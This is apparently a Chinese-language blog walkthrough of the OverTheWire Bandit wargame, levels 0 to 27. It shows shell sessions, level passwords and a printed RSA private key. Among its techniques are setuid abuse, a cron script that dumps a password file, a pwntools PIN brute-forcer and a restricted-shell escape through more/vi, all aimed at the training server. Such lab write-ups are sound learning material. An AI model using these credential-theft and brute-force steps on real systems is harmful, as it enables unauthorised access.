Bandit

科研生活太难顶了，做点小闯关游戏放松下

参考：

题目地址

linux练习平台WarGame之bandit通关日志

OverTheWire: Bandit通关指引

OverTheWire:Bandit通关WriteUp（2019.01.17完）

Level 0

SSH连接即可

Level 0 → Level 1

bandit0@bandit:~$ ls
readme
bandit0@bandit:~$ cat readme

Level 1 → Level 2

用上一关拿到的密码登录bandit1

bandit1@bandit:~$ ls
-
bandit1@bandit:~$ cat ./-

Level 2 → Level 3

bandit2@bandit:~$ ls -alit
total 24
  1514 drwxr-xr-x 70 root    root    4096 Oct  5 06:20 ..
517590 drwxr-xr-x  2 root    root    4096 Oct  5 06:19 .
517780 -rw-r-----  1 bandit3 bandit2   33 Oct  5 06:19 spaces in this filename
517593 -rw-r--r--  1 root    root     220 Jan  6  2022 .bash_logout
517592 -rw-r--r--  1 root    root    3771 Jan  6  2022 .bashrc
517591 -rw-r--r--  1 root    root     807 Jan  6  2022 .profile
bandit2@bandit:~$ cat "spaces in this filename"
aBZ0W5EmUfAf7kHTQeOwd8bauFJ2lAiG

Level 3 → Level 4

bandit3@bandit:~$ ls -ali
total 24
517645 drwxr-xr-x  3 root root 4096 Oct  5 06:19 .
  1514 drwxr-xr-x 70 root root 4096 Oct  5 06:20 ..
517648 -rw-r--r--  1 root root  220 Jan  6  2022 .bash_logout
517647 -rw-r--r--  1 root root 3771 Jan  6  2022 .bashrc
517949 drwxr-xr-x  2 root root 4096 Oct  5 06:19 inhere
517646 -rw-r--r--  1 root root  807 Jan  6  2022 .profile
bandit3@bandit:~$ cd inhere
bandit3@bandit:~/inhere$ ls
bandit3@bandit:~/inhere$ ls -ali
total 12
517949 drwxr-xr-x 2 root    root    4096 Oct  5 06:19 .
517645 drwxr-xr-x 3 root    root    4096 Oct  5 06:19 ..
517951 -rw-r----- 1 bandit4 bandit3   33 Oct  5 06:19 .hidden
bandit3@bandit:~/inhere$ cat .hidden
2EW7BBsr6aMMoJ2HjW067dm8EgX26xNe

Level 4 → Level 5

解法一

直接暴力读每个文件

bandit4@bandit:~$ ls -alit
total 24
  1514 drwxr-xr-x 70 root root 4096 Oct  5 06:20 ..
517972 drwxr-xr-x  2 root root 4096 Oct  5 06:19 inhere
517670 drwxr-xr-x  3 root root 4096 Oct  5 06:19 .
517673 -rw-r--r--  1 root root  220 Jan  6  2022 .bash_logout
517672 -rw-r--r--  1 root root 3771 Jan  6  2022 .bashrc
517671 -rw-r--r--  1 root root  807 Jan  6  2022 .profile
bandit4@bandit:~$ cd inhere
bandit4@bandit:~/inhere$ ls -ali
total 48
517972 drwxr-xr-x 2 root    root    4096 Oct  5 06:19 .
517670 drwxr-xr-x 3 root    root    4096 Oct  5 06:19 ..
517979 -rw-r----- 1 bandit5 bandit4   33 Oct  5 06:19 -file00
517984 -rw-r----- 1 bandit5 bandit4   33 Oct  5 06:19 -file01
517985 -rw-r----- 1 bandit5 bandit4   33 Oct  5 06:19 -file02
517987 -rw-r----- 1 bandit5 bandit4   33 Oct  5 06:19 -file03
517989 -rw-r----- 1 bandit5 bandit4   33 Oct  5 06:19 -file04
517994 -rw-r----- 1 bandit5 bandit4   33 Oct  5 06:19 -file05
517996 -rw-r----- 1 bandit5 bandit4   33 Oct  5 06:19 -file06
517997 -rw-r----- 1 bandit5 bandit4   33 Oct  5 06:19 -file07
518000 -rw-r----- 1 bandit5 bandit4   33 Oct  5 06:19 -file08
518001 -rw-r----- 1 bandit5 bandit4   33 Oct  5 06:19 -file09
bandit4@bandit:~/inhere$ cat ./-file00
QRrtZ¾iÿ	H
                 |٩ȧɃ^¢bandit4@bandit:~/inhere$ cat ./-file01
7L3򙋍¯	Ŵ¬݈Eș֜	¯V&ꓨ¢Fµbandit4@bandit:~/inhere$ cat ./-file02
¬¬򋐌«ؠ\׭⃐Ոxז2¬Kbandit4@bandit:~/inhere$ cat ./-file03
ઃxݣeǾۚVO¸³p{¶	³ύUb4¿bandit4@bandit:~/inhere$ cat ./-file04
gQ񉏥E}:Ƨ¾«j8󃻄�𺯢ebandit4@bandit:~/inhere$ cat ./-file05
S 0¯·]7󾜫¹ÿ񣌼´~bandit4@bandit:~/inhere$ cat ./-file06
G=1ٚCԐB׃΢
        º阏°9ؽ5bandit4@bandit:~/inhere$ cat ./-file07
lrIWWI6bB37kxfiCQZqUdOIYfr6eEeqR
bandit4@bandit:~/inhere$ cat ./-file08
¹º댝~ë򷷢T笙Z$ᕙ¡"޲
bandit4@bandit:~/inhere$ cat ./-file09
Z񜷶򒟴Ր¶£qܕ7¤𵁕/򮹘bandit4@bandit:~/inhere$

解法二

用file命令看文件类型，结合human-readable file可以知道是ASCII text类型

bandit4@bandit:~/inhere$ file ./-file*
./-file00: data
./-file01: data
./-file02: data
./-file03: data
./-file04: data
./-file05: data
./-file06: data
./-file07: ASCII text
./-file08: data
./-file09: data
bandit4@bandit:~/inhere$ cat ./-file07
lrIWWI6bB37kxfiCQZqUdOIYfr6eEeqR

Level 5 → Level 6

使用find即可

bandit5@bandit:~$ ls -ali
total 24
517675 drwxr-xr-x  3 root root    4096 Oct  5 06:19 .
  1514 drwxr-xr-x 70 root root    4096 Oct  5 06:20 ..
517678 -rw-r--r--  1 root root     220 Jan  6  2022 .bash_logout
517677 -rw-r--r--  1 root root    3771 Jan  6  2022 .bashrc
518002 drwxr-x--- 22 root bandit5 4096 Oct  5 06:19 inhere
517676 -rw-r--r--  1 root root     807 Jan  6  2022 .profile
bandit5@bandit:~$ cd inhere/
bandit5@bandit:~/inhere$ ls -ali
total 88
518002 drwxr-x--- 22 root bandit5 4096 Oct  5 06:19 .
517675 drwxr-xr-x  3 root root    4096 Oct  5 06:19 ..
518003 drwxr-x---  2 root bandit5 4096 Oct  5 06:19 maybehere00
518013 drwxr-x---  2 root bandit5 4096 Oct  5 06:19 maybehere01
518024 drwxr-x---  2 root bandit5 4096 Oct  5 06:19 maybehere02
518043 drwxr-x---  2 root bandit5 4096 Oct  5 06:19 maybehere03
518053 drwxr-x---  2 root bandit5 4096 Oct  5 06:19 maybehere04
518063 drwxr-x---  2 root bandit5 4096 Oct  5 06:19 maybehere05
518073 drwxr-x---  2 root bandit5 4096 Oct  5 06:19 maybehere06
518083 drwxr-x---  2 root bandit5 4096 Oct  5 06:19 maybehere07
518093 drwxr-x---  2 root bandit5 4096 Oct  5 06:19 maybehere08
518103 drwxr-x---  2 root bandit5 4096 Oct  5 06:19 maybehere09
518113 drwxr-x---  2 root bandit5 4096 Oct  5 06:19 maybehere10
518123 drwxr-x---  2 root bandit5 4096 Oct  5 06:19 maybehere11
518133 drwxr-x---  2 root bandit5 4096 Oct  5 06:19 maybehere12
518143 drwxr-x---  2 root bandit5 4096 Oct  5 06:19 maybehere13
518153 drwxr-x---  2 root bandit5 4096 Oct  5 06:19 maybehere14
518163 drwxr-x---  2 root bandit5 4096 Oct  5 06:19 maybehere15
518173 drwxr-x---  2 root bandit5 4096 Oct  5 06:19 maybehere16
518183 drwxr-x---  2 root bandit5 4096 Oct  5 06:19 maybehere17
518193 drwxr-x---  2 root bandit5 4096 Oct  5 06:19 maybehere18
518203 drwxr-x---  2 root bandit5 4096 Oct  5 06:19 maybehere19
bandit5@bandit:~/inhere$ find ./ -type f -size 1033c
./maybehere07/.file2
bandit5@bandit:~/inhere$ cat ./maybehere07/.file2
P4L4vucdmLnm8I7Vl7jG1ApGSfjYKqJU

Level 6 → Level 7

使用对应条件find即可，只是注意把错误重定向一下（解释）

bandit6@bandit:~$ ls
bandit6@bandit:~$ ls -ali
total 20
517680 drwxr-xr-x  2 root root 4096 Oct  5 06:19 .
  1514 drwxr-xr-x 70 root root 4096 Oct  5 06:20 ..
517683 -rw-r--r--  1 root root  220 Jan  6  2022 .bash_logout
517682 -rw-r--r--  1 root root 3771 Jan  6  2022 .bashrc
517681 -rw-r--r--  1 root root  807 Jan  6  2022 .profile
bandit6@bandit:~$ find / -user bandit7 -group bandit6 -size 33c 2>/dev/null
/var/lib/dpkg/info/bandit7.password
bandit6@bandit:~$ cat /var/lib/dpkg/info/bandit7.password
z7WtoNQU2XfjmMtWA8u5rN4vzqu4v99S

Level 7 → Level 8

bandit7@bandit:~$ ls -alih
total 4.1M
517685 drwxr-xr-x  2 root    root    4.0K Oct  5 06:19 .
  1514 drwxr-xr-x 70 root    root    4.0K Oct  5 06:20 ..
517688 -rw-r--r--  1 root    root     220 Jan  6  2022 .bash_logout
517687 -rw-r--r--  1 root    root    3.7K Jan  6  2022 .bashrc
518216 -rw-r-----  1 bandit8 bandit7 4.0M Oct  5 06:19 data.txt
517686 -rw-r--r--  1 root    root     807 Jan  6  2022 .profile
bandit7@bandit:~$ du -sh data.txt 
4.0M	data.txt
bandit7@bandit:~$ cat data.txt | grep millionth
millionth	TESKZC0XvTetK0S9xNwm25STk5iWrBvP

Level 8 → Level 9

linux中sort和uniq命令

bandit8@bandit:~$ ls -alih
total 56K
517690 drwxr-xr-x  2 root    root    4.0K Oct  5 06:19 .
  1514 drwxr-xr-x 70 root    root    4.0K Oct  5 06:20 ..
517693 -rw-r--r--  1 root    root     220 Jan  6  2022 .bash_logout
517692 -rw-r--r--  1 root    root    3.7K Jan  6  2022 .bashrc
518219 -rw-r-----  1 bandit9 bandit8  33K Oct  5 06:19 data.txt
517691 -rw-r--r--  1 root    root     807 Jan  6  2022 .profile
bandit8@bandit:~$ sort -n data.txt | uniq -u
EN632PlfYiZbn3PhVK3XOGSlNInNE00t

Level 9 → Level 10

bandit9@bandit:~$ ls -alih
total 40K
517695 drwxr-xr-x  2 root     root    4.0K Oct  5 06:19 .
  1514 drwxr-xr-x 70 root     root    4.0K Oct  5 06:20 ..
517698 -rw-r--r--  1 root     root     220 Jan  6  2022 .bash_logout
517697 -rw-r--r--  1 root     root    3.7K Jan  6  2022 .bashrc
517702 -rw-r-----  1 bandit10 bandit9  19K Oct  5 06:19 data.txt
517696 -rw-r--r--  1 root     root     807 Jan  6  2022 .profile
bandit9@bandit:~$ cat data.txt | strings | grep =
=2""L(
x]T========== theG)"
========== passwordk^
Y=xW
t%=q
========== is
4=}D3
{1\=
FC&=z
=Y!m
	$/2`)=Y
4_Q=\
MO=(
?=|J
WX=DA
{TbJ;=l
[=lI
========== G7w8LIi6J3kTb8A7j9LgrywtEUlyyp6s
>8=6
=r=_
=uea
zl=4

Level 10 → Level 11

bandit10@bandit:~$ ls -alih
total 24K
517540 drwxr-xr-x  2 root     root     4.0K Oct  5 06:19 .
  1514 drwxr-xr-x 70 root     root     4.0K Oct  5 06:20 ..
517543 -rw-r--r--  1 root     root      220 Jan  6  2022 .bash_logout
517542 -rw-r--r--  1 root     root     3.7K Jan  6  2022 .bashrc
517703 -rw-r-----  1 bandit11 bandit10   69 Oct  5 06:19 data.txt
517541 -rw-r--r--  1 root     root      807 Jan  6  2022 .profile
bandit10@bandit:~$ base64 -d data.txt 
The password is 6zPeziLdR2RKNdNYFNb6nVCKzphlXHBM

Level 11 → Level 12

bandit11@bandit:~$ ls -alih
total 24K
517545 drwxr-xr-x  2 root     root     4.0K Oct  5 06:19 .
  1514 drwxr-xr-x 70 root     root     4.0K Oct  5 06:20 ..
517548 -rw-r--r--  1 root     root      220 Jan  6  2022 .bash_logout
517547 -rw-r--r--  1 root     root     3.7K Jan  6  2022 .bashrc
517704 -rw-r-----  1 bandit12 bandit11   49 Oct  5 06:19 data.txt
517546 -rw-r--r--  1 root     root      807 Jan  6  2022 .profile
bandit11@bandit:~$ cat data.txt 
Gur cnffjbeq vf WIAOOSFzMjXXBC0KoSKBbJ8puQm5lIEi
bandit11@bandit:~$ cat data.txt | tr 'a-zA-Z' 'n-za-mN-ZA-M'
The password is JVNBBFSmZwKKOP0XbFXOoW8chDz5yVRv
bandit11@bandit:~$ cat data.txt | tr [a-zA-Z] [n-za-mN-ZA-M]
The password is JVNBBFSmZwKKOP0XbFXOoW8chDz5yVRv
bandit11@bandit:~$ cat data.txt | tr a-zA-Z n-za-mN-ZA-M
The password is JVNBBFSmZwKKOP0XbFXOoW8chDz5yVRv

Level 12 → Level 13

bandit12@bandit:~$ mkdir /tmp/evo1
bandit12@bandit:~$ cp data.txt /tmp/evo1/
bandit12@bandit:~$ cd /tmp/evo1
bandit12@bandit:/tmp/evo1$ ls -ali
total 408
303152 drwxrwxr-x   2 bandit12 bandit12   4096 Mar 22 17:10 .
  1554 drwxrwx-wt 248 root     root     405504 Mar 22 17:10 ..
303195 -rw-r-----   1 bandit12 bandit12   2582 Mar 22 17:10 data.txt
bandit12@bandit:/tmp/evo1$ file data.txt 
data.txt: ASCII text
bandit12@bandit:/tmp/evo1$ xxd -r data.txt data.bin
bandit12@bandit:/tmp/evo1$ ls
data.bin  data.txt
bandit12@bandit:/tmp/evo1$ file data.bin 
data.bin: gzip compressed data, was "data2.bin", last modified: Thu Oct  5 06:19:20 2023, max compression, from Unix, original size modulo 2^32 573
bandit12@bandit:/tmp/evo1$ mv data.bin data.gz
bandit12@bandit:/tmp/evo1$ ls
data.gz  data.txt
bandit12@bandit:/tmp/evo1$ gzip -d data.gz 
bandit12@bandit:/tmp/evo1$ ls
data  data.txt
bandit12@bandit:/tmp/evo1$ file data
data: bzip2 compressed data, block size = 900k
bandit12@bandit:/tmp/evo1$ mv data data.bz2
bandit12@bandit:/tmp/evo1$ ls
data.bz2  data.txt
bandit12@bandit:/tmp/evo1$ bzip2 -d data.bz2 
bandit12@bandit:/tmp/evo1$ ls
data  data.txt
bandit12@bandit:/tmp/evo1$ file data
data: gzip compressed data, was "data4.bin", last modified: Thu Oct  5 06:19:20 2023, max compression, from Unix, original size modulo 2^32 20480
bandit12@bandit:/tmp/evo1$ mv data data.gz
bandit12@bandit:/tmp/evo1$ gzip -d data.gz 
bandit12@bandit:/tmp/evo1$ ls
data  data.txt
bandit12@bandit:/tmp/evo1$ file data
data: POSIX tar archive (GNU)
bandit12@bandit:/tmp/evo1$ mv data data.tar
bandit12@bandit:/tmp/evo1$ tar -xvf data.tar 
data5.bin
bandit12@bandit:/tmp/evo1$ file data5.bin
data5.bin: POSIX tar archive (GNU)
bandit12@bandit:/tmp/evo1$ mv data5.bin data5.tar
bandit12@bandit:/tmp/evo1$ tar -xvf data5.tar 
data6.bin
bandit12@bandit:/tmp/evo1$ file data6.bin 
data6.bin: bzip2 compressed data, block size = 900k
bandit12@bandit:/tmp/evo1$ mv data6.bin data6.bz2
bandit12@bandit:/tmp/evo1$ bzip2 -d data6.bz2 
bandit12@bandit:/tmp/evo1$ ls
data5.tar  data6  data.tar  data.txt
bandit12@bandit:/tmp/evo1$ file data6
data6: POSIX tar archive (GNU)
bandit12@bandit:/tmp/evo1$ mv data6 data6.tar
bandit12@bandit:/tmp/evo1$ tar -xvf data6.tar 
data8.bin
bandit12@bandit:/tmp/evo1$ file data8.bin 
data8.bin: gzip compressed data, was "data9.bin", last modified: Thu Oct  5 06:19:20 2023, max compression, from Unix, original size modulo 2^32 49
bandit12@bandit:/tmp/evo1$ mv data8.bin data8.gz
bandit12@bandit:/tmp/evo1$ gzip -d data8.gz 
bandit12@bandit:/tmp/evo1$ ls
data5.tar  data6.tar  data8  data.tar  data.txt
bandit12@bandit:/tmp/evo1$ file data8
data8: ASCII text
bandit12@bandit:/tmp/evo1$ cat data8
The password is wbWdlBxEir4CaE8LaPhauuOo6pwRmrDw

Level 13 → Level 14

bandit13@bandit:~$ ssh -i sshkey.private bandit14@localhost -p2220
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

bandit14@bandit:~$ cat /etc/bandit_pass/bandit14
fGrHPx402xGC7U7rXKDaxiWFTOiF0ENq

Level 14 → Level 15

bandit14@bandit:~$ telnet localhost 30000
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
fGrHPx402xGC7U7rXKDaxiWFTOiF0ENq
Correct!
jN2kgmIXJ6fShzhT2avhotn4Zcka6tnt

Connection closed by foreign host.

Level 15 → Level 16

bandit15@bandit:~$ openssl s_client -connect localhost:30001
...省略这里输出的信息...
read R BLOCK
jN2kgmIXJ6fShzhT2avhotn4Zcka6tnt
Correct!
JQttfApK4SeyHwDlI9SXGR50qclOAil1

closed

Level 16 → Level 17

bandit16@bandit:~$ nmap -sV localhost -p 31000-32000
...省略这里输出的信息...
PORT      STATE SERVICE     VERSION
31046/tcp open  echo
31518/tcp open  ssl/echo
31691/tcp open  echo
31790/tcp open  ssl/unknown
31960/tcp open  echo
...省略这里输出的信息...
bandit16@bandit:~$ openssl s_client -connect localhost:31790
...省略这里输出的信息...
read R BLOCK
JQttfApK4SeyHwDlI9SXGR50qclOAil1
Correct!
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ
imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ
Ja6Lzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu
DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW
JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX
x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD
KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl
J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd
d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC
YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A
vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama
+TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT
8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx
SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd
HCctNi/FwjulhttFx/rHYKhLidZDFYeiE/v45bN4yFm8x7R/b0iE7KaszX+Exdvt
SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A
R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi
Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg
R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu
L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni
blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU
YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM
77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b
dxviW8+TFVEBl1O4f7HVm6EpTscdDxU+bCXWkfjuRb7Dy9GOtt9JPsX8MBTakzh3
vBgsyi/sN3RqRBcGU40fOoZyfAMT8s1m/uYv52O6IgeuZ/ujbjY=
-----END RSA PRIVATE KEY-----

closed

将该密钥保存在本地命名为17.key，然后用XShell选择使用Public Key的方法登录即可

这里给一下17关的密码

bandit17@bandit:~$ cat /etc/bandit_pass/bandit17
VwOSWtCA7lRKkTfbr2IDh6awj9RNZM5e

Level 17 → Level 18

diff一下新的里面的为真密码

bandit17@bandit:~$ ls
passwords.new  passwords.old
bandit17@bandit:~$ diff passwords.new passwords.old
42c42
< hga5tuuCLF6fFzUpnagiMN8ssu9LFrdg
---
> p6ggwdNHncnmCNxuAt0KtKVq185ZU7AW

Level 18 → Level 19

C:\Users\Evolution>ssh -p 2220 bandit18@bandit.labs.overthewire.org ls
                         _                     _ _ _
                        | |__   __ _ _ __   __| (_) |_
                        | '_ \ / _` | '_ \ / _` | | __|
                        | |_) | (_| | | | | (_| | | |_
                        |_.__/ \__,_|_| |_|\__,_|_|\__|


                      This is an OverTheWire game server.
            More information on http://www.overthewire.org/wargames

bandit18@bandit.labs.overthewire.org's password:
readme

C:\Users\Evolution>ssh -p 2220 bandit18@bandit.labs.overthewire.org cat readme
                         _                     _ _ _
                        | |__   __ _ _ __   __| (_) |_
                        | '_ \ / _` | '_ \ / _` | | __|
                        | |_) | (_| | | | | (_| | | |_
                        |_.__/ \__,_|_| |_|\__,_|_|\__|


                      This is an OverTheWire game server.
            More information on http://www.overthewire.org/wargames

bandit18@bandit.labs.overthewire.org's password:
awhqfNnAbc1naukrpqDYcF95h7HoMTrC

Level 19 → Level 20

bandit19@bandit:~$ ll
total 36
drwxr-xr-x  2 root     root      4096 Oct  5 06:19 ./
drwxr-xr-x 70 root     root      4096 Oct  5 06:20 ../
-rwsr-x---  1 bandit20 bandit19 14876 Oct  5 06:19 bandit20-do*
-rw-r--r--  1 root     root       220 Jan  6  2022 .bash_logout
-rw-r--r--  1 root     root      3771 Jan  6  2022 .bashrc
-rw-r--r--  1 root     root       807 Jan  6  2022 .profile
bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
VxCazJaVykI6W36BkBU0mJTCM8rR95XT

Level 20 → Level 21

将密码丢在固定端口后让suconnect去连接即可，&表示后台运行。

bandit20@bandit:~$ ll
total 36
drwxr-xr-x  2 root     root      4096 Oct  5 06:19 ./
drwxr-xr-x 70 root     root      4096 Oct  5 06:20 ../
-rw-r--r--  1 root     root       220 Jan  6  2022 .bash_logout
-rw-r--r--  1 root     root      3771 Jan  6  2022 .bashrc
-rw-r--r--  1 root     root       807 Jan  6  2022 .profile
-rwsr-x---  1 bandit21 bandit20 15600 Oct  5 06:19 suconnect*
bandit20@bandit:~$ cat /etc/bandit_pass/bandit20
VxCazJaVykI6W36BkBU0mJTCM8rR95XT
bandit20@bandit:~$ cat /etc/bandit_pass/bandit20 | nc -l -p 12345 &
[1] 2176985
bandit20@bandit:~$ ./suconnect 12345
Read: VxCazJaVykI6W36BkBU0mJTCM8rR95XT
Password matches, sending next password
NvEJF7oVjkddltPSrdKEFOllh9V1IBcq
[1]+  Done                    cat /etc/bandit_pass/bandit20 | nc -l -p 12345

Level 21 → Level 22

bandit21@bandit:~$ cd /etc/cron.d/
bandit21@bandit:/etc/cron.d$ ll
total 56
drwxr-xr-x   2 root root  4096 Oct  5 06:20 ./
drwxr-xr-x 106 root root 12288 Oct  5 06:20 ../
-rw-r--r--   1 root root    62 Oct  5 06:19 cronjob_bandit15_root
-rw-r--r--   1 root root    62 Oct  5 06:19 cronjob_bandit17_root
-rw-r--r--   1 root root   120 Oct  5 06:19 cronjob_bandit22
-rw-r--r--   1 root root   122 Oct  5 06:19 cronjob_bandit23
-rw-r--r--   1 root root   120 Oct  5 06:19 cronjob_bandit24
-rw-r--r--   1 root root    62 Oct  5 06:19 cronjob_bandit25_root
-rw-r--r--   1 root root   201 Jan  8  2022 e2scrub_all
-rwx------   1 root root    52 Oct  5 06:20 otw-tmp-dir*
-rw-r--r--   1 root root   102 Mar 23  2022 .placeholder
-rw-r--r--   1 root root   396 Feb  2  2021 sysstat
bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@bandit:/etc/cron.d$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
WdDozAdTM2z9DiFEQ2mGlwngMfj4EZff

Level 22 → Level 23

bandit22@bandit:~$ cd /etc/cron.d/
bandit22@bandit:/etc/cron.d$ ll
total 56
drwxr-xr-x   2 root root  4096 Oct  5 06:20 ./
drwxr-xr-x 106 root root 12288 Oct  5 06:20 ../
-rw-r--r--   1 root root    62 Oct  5 06:19 cronjob_bandit15_root
-rw-r--r--   1 root root    62 Oct  5 06:19 cronjob_bandit17_root
-rw-r--r--   1 root root   120 Oct  5 06:19 cronjob_bandit22
-rw-r--r--   1 root root   122 Oct  5 06:19 cronjob_bandit23
-rw-r--r--   1 root root   120 Oct  5 06:19 cronjob_bandit24
-rw-r--r--   1 root root    62 Oct  5 06:19 cronjob_bandit25_root
-rw-r--r--   1 root root   201 Jan  8  2022 e2scrub_all
-rwx------   1 root root    52 Oct  5 06:20 otw-tmp-dir*
-rw-r--r--   1 root root   102 Mar 23  2022 .placeholder
-rw-r--r--   1 root root   396 Feb  2  2021 sysstat
bandit22@bandit:/etc/cron.d$ cat cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@bandit:/etc/cron.d$ whoami
bandit22
bandit22@bandit:/etc/cron.d$ cat /tmp/$(echo I am user bandit23 | md5sum | cut -d ' ' -f 1)
QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G

Level 23 → Level 24

在执行脚本的目录下写个脚本把密码读出来，记得赋予可执行权限

bandit23@bandit:~$ cd /var/spool/bandit24/foo
bandit23@bandit:/var/spool/bandit24/foo$ vim getpass.sh
bandit23@bandit:/var/spool/bandit24/foo$ cat getpass.sh
#!/bin/bash

cat /etc/bandit_pass/bandit24 > /tmp/bandit24pass
bandit23@bandit:/var/spool/bandit24/foo$ chmod +x getpass.sh
bandit23@bandit:/var/spool/bandit24/foo$ cat getpass.sh
#!/bin/bash

cat /etc/bandit_pass/bandit24 > /tmp/bandit24pass
bandit23@bandit:/var/spool/bandit24/foo$ cat getpass.sh
cat: getpass.sh: No such file or directory
bandit23@bandit:/var/spool/bandit24/foo$ cat /tmp/bandit24pass
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar

Level 24 → Level 25

到/tmp目录下创建该文件然后运行即可

from pwn import *

conn = remote('localhost', '30002')
conn.recvline()
for i in range(10000):
    tmp = str(i).zfill(4)
    print('[+]Try PinCode: ' + str(tmp))
    conn.sendline(bytes('VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar ' + tmp, encoding='utf-8'))
    response = conn.recvline()
    print(response)
    if "Wrong" not in str(response,encoding='utf-8'):
       print("[*]Pincode: " + str(tmp))
       print(conn.recvall())
       exit(0)

最后得到密码

[+]Try PinCode: 9014
b'Wrong! Please enter the correct pincode. Try again.\n'
[+]Try PinCode: 9015
b'Correct!\n'
[*]Pincode: 9015
[+] Receiving all data: Done (76B)
[*] Closed connection to localhost port 30002
b'The password of user bandit25 is p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d\n\nExiting.\n'

Level 25 → Level 26

bandit25@bandit:~$ ls
bandit26.sshkey
bandit25@bandit:~$ ssh -i bandit26.sshkey bandit26@localhost
kex_exchange_identification: Connection closed by remote host
Connection closed by 127.0.0.1 port 22
bandit25@bandit:~$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh

export TERM=linux

exec more ~/text.txt
exit 0

缩小命令行窗口大小后执行下面这句

bandit25@bandit:~$ ssh -i bandit26.sshkey -p 2220 bandit26@bandit.labs.overthewire.org

然后进入more命令后按v进入编辑模式，最后输入:r /etc/bandit_pass/bandit26即可

c7GvcKlw9mC7aUQaPx7nwFstuAIBw1o1

Level 26 → Level 27

跟上关一样的手法缩小窗口输入密码连接

ssh -p 2220 bandit26@bandit.labs.overthewire.org

到达more页面后输入v进入vi模式，然后依次执行下列命令从而用vi模式来呼唤出shell（提权），最后读取密码即可

:set shell sh=/bin/sh
:sh
$ ls -al
total 44
drwxr-xr-x  3 root     root      4096 Oct  5 06:19 .
drwxr-xr-x 70 root     root      4096 Oct  5 06:20 ..
-rw-r--r--  1 root     root       220 Jan  6  2022 .bash_logout
-rw-r--r--  1 root     root      3771 Jan  6  2022 .bashrc
-rw-r--r--  1 root     root       807 Jan  6  2022 .profile
drwxr-xr-x  2 root     root      4096 Oct  5 06:19 .ssh
-rwsr-x---  1 bandit27 bandit26 14876 Oct  5 06:19 bandit27-do
-rw-r-----  1 bandit26 bandit26   258 Oct  5 06:19 text.txt
$ ./bandit27-do cat /etc/bandit_pass/bandit27
YnQpBuifNMas1hcUFk70ZmqkhUU2EuaS

Level 27 → Level 28

bandit27@bandit:~$ cd /tmp
bandit27@bandit:/tmp$ mkdir evo2
bandit27@bandit:/tmp$ cd evo2
